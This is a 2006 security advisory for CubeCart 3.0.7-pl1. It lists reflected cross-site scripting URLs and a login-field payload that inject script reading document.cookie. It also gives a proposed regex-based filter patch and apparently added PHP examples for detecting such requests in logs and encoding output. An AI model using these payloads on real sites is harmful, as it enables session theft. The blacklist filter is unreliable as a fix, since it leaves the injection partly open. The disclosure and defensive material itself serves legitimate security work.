cubecartXSS.txt
Source: packetstormsecurity.com (PACKETSTORM:43259)
Date: Jan 22, 2006
Author: Lostmon

################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report: http://bugs.cubecart.com/?do=details&id=459
Advisory: http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html
vendor notify: yes   exploit available: yes
################################################
  
I recommend that all vendors look at this paper.
This is the new possible impact of XSS attacks:
  
http://www.bindshell.net/papers/xssv.html  
  
CubeCart contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
some variables upon submission to the 'index.php' script.
This could allow a user to create a specially crafted URL that
would execute arbitrary script code in a user's browser within the trust
relationship between the browser and the server, leading to a
loss of integrity.
  
###############  
VERSIONS  
###############  
  
CubeCart 3.0.7-pl1 is vulnerable.
Other versions are possibly vulnerable too.
  
#################  
Timeline  
#################  
  
Discovered: 24 Dec 2005
Vendor notified: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure: 16-01-2006
  
###############  
Examples:  
###############

http://[victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZXdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go

http://[victim]/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat

http://[victim]/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script>
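As an added example (not part of the advisory), the following PHP script shows how requests of the shape listed above can be spotted in web server access logs: it pulls the request URI out of each line, decodes the query parameters, and flags values that close an attribute or open a tag. The log lines are constructed for illustration and the function names are this example's own.

```php
<?php
// Added example, not CubeCart's code. Scans common-log-format lines for
// query values that carry the markup seen in this advisory's payloads.

// Constructed sample log lines (not real traffic).
$constructedLog = array(
    '10.0.0.5 - - [22/Jan/2006:10:01:02 +0000] "GET /cc3/index.php?act=viewCat&catId=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Jan/2006:10:01:07 +0000] "GET /cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go HTTP/1.1" 200 5311',
    '10.0.0.9 - - [22/Jan/2006:10:01:09 +0000] "GET /cc3/cart.php?act=reg&redir=L3NpdGUv%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 4870',
    '10.0.0.7 - - [22/Jan/2006:10:02:00 +0000] "GET /cc3/index.php?act=viewProd&productId=1 HTTP/1.1" 200 6002',
);

// Returns the decoded query parameters whose value can break out of an
// attribute (a quote followed by '>') or open a tag ('<' followed by a
// tag-like name, '/' or '!').
function suspiciousParams($requestUri) {
    $query = parse_url($requestUri, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return array();
    }
    $params = array();
    parse_str($query, $params);   // parse_str() URL-decodes the values
    $hits = array();
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        // Decode once more so a double-encoded value is inspected as well.
        $decoded = rawurldecode($value);
        if (preg_match('/["\']\s*>|<\s*\/?[a-z!]/i', $decoded)) {
            $hits[$name] = $decoded;
        }
    }
    return $hits;
}

// Walks the log, extracts the request URI from each line and collects the
// lines whose parameters look like reflected-XSS attempts.
function scanLog(array $lines) {
    $findings = array();
    foreach ($lines as $line) {
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $hits = suspiciousParams($m[1]);
        if ($hits) {
            $findings[] = array('line' => $line, 'params' => $hits);
        }
    }
    return $findings;
}

foreach (scanLog($constructedLog) as $finding) {
    foreach ($finding['params'] as $name => $value) {
        printf("possible reflected XSS attempt: param=%s value=%s\n", $name, $value);
    }
}
```

On the constructed lines the second and third requests are reported (the searchStr and redir values decode to a quote followed by `><script`), while the two ordinary catalogue requests are not. The pattern is deliberately narrow; a production rule would also cover the user field described below, which arrives in a POST body and therefore never shows up in the request line.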
  
#################  
User field XSS  
#################  
Go to http://[victim]/cc3/index.php?act=login
and insert this in the username field: "><script>alert(document.cookie)</script>
  
#############  
SOLUTION  
#############  
  
No solution was available at this time.

Currently I have found a possible fix:

If we look in includes/functions.inc.php for the function treatGet($text),
around line 85, I changed the original code to this:

It removes all possible HTML code inserted:
  
function treatGet($text){
    // These are regular expressions, so preg_replace() is needed;
    // str_replace() would only match them as literal strings.
    $patterns = array(
        "@<script[^>]*?>.*?</script>@si",   // <script> blocks
        "@<[\/\!]*?[^<>]*?>@si",            // any remaining tag
        "@([\r\n])[\s]+@",                  // whitespace runs after a line break
        "@&(quot|#34);@i",                  // named entities
        "@&(amp|#38);@i",
        "@&(lt|#60);@i",
        "@&(gt|#62);@i",
        "@&(nbsp|#160);@i",
        "@&(iexcl|#161);@i",
        "@&(cent|#162);@i",
        "@&(pound|#163);@i",
        "@&(copy|#169);@i",
        "@&#(\d+);@"                        // numeric entities; the "e" modifier
                                            // (evaluates the replacement as PHP) is dropped
    );
    $text = preg_replace($patterns, "", $text);
    return $text;
}
  
Close, save and upload the new file.

Around line 80 in index.php we find:
  
if(isset($_GET['searchStr'])){
    $body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
} else {
    $body->assign("SEARCHSTR","");
}
  
  
This can be replaced with:
  
if(isset($_GET['searchStr'])){
    // Overwrite the request value itself, so any later use of
    // $_GET['searchStr'] in the script also gets the filtered value.
    $_GET['searchStr'] = treatGet($_GET['searchStr']);
    $body->assign("SEARCHSTR",$_GET['searchStr']);
} else {
    $body->assign("SEARCHSTR","");
}
---------------------------------------  
  
Close, save and upload it.
This only fixes the searchStr parameter, but you can search the
source code to fix the other functions the same way.
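The fix above filters input with a tag-stripping blacklist. The example below, added here and not CubeCart's code, shows the alternative a defender would normally reach for: encoding the value for the HTML context where the template emits it. It assumes the template writes SEARCHSTR into an attribute such as `<input type="text" name="searchStr" value="{SEARCHSTR}">`, which is consistent with the leading `">` of the payloads in this advisory; the function names are this example's own.

```php
<?php
// Added example, not CubeCart's code. Assumes the template emits SEARCHSTR
// inside an HTML attribute: <input type="text" name="searchStr" value="{SEARCHSTR}">

// Vulnerable rendering: the query value lands in the attribute unchanged,
// so a quote in the value closes the attribute and then the tag.
function renderSearchBoxVulnerable($searchStr) {
    return '<input type="text" name="searchStr" value="' . $searchStr . '">';
}

// Hardened rendering: encode for the HTML attribute context at output time.
// ENT_QUOTES also covers single-quoted attributes; the charset argument
// should match the encoding the page is served with.
function renderSearchBoxSafe($searchStr) {
    $encoded = htmlspecialchars($searchStr, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="searchStr" value="' . $encoded . '">';
}

// Equivalent of the index.php block quoted above: the value handed to the
// template is encoded, and a missing parameter yields an empty string
// without touching $_GET.
function searchStrForTemplate(array $get) {
    $value = isset($get['searchStr']) ? (string) $get['searchStr'] : '';
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// The searchStr payload from this advisory, as PHP sees it after the
// query string has been decoded.
$payload = '"><script>alert(document.cookie)</script>';

echo renderSearchBoxVulnerable($payload), "\n";
echo renderSearchBoxSafe($payload), "\n";
echo searchStrForTemplate(array('searchStr' => $payload)), "\n";
echo searchStrForTemplate(array()), "\n";
```

Rendered by the vulnerable function, the payload closes the value attribute and the input tag and the script element that follows is parsed as markup; rendered by the safe function it becomes `&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;` and stays inert text inside the attribute. Output encoding also covers what the regex strip in treatGet() cannot: after treatGet() removes the `<script>...</script>` block the leading `">` survives, and any value that contains no angle bracket or entity passes through every one of its patterns unchanged.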
  
  
##################### End ########################
  
Thanks to estrella for being my light
Thanks to all manglers of http://www.osvdb.org
  
--
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....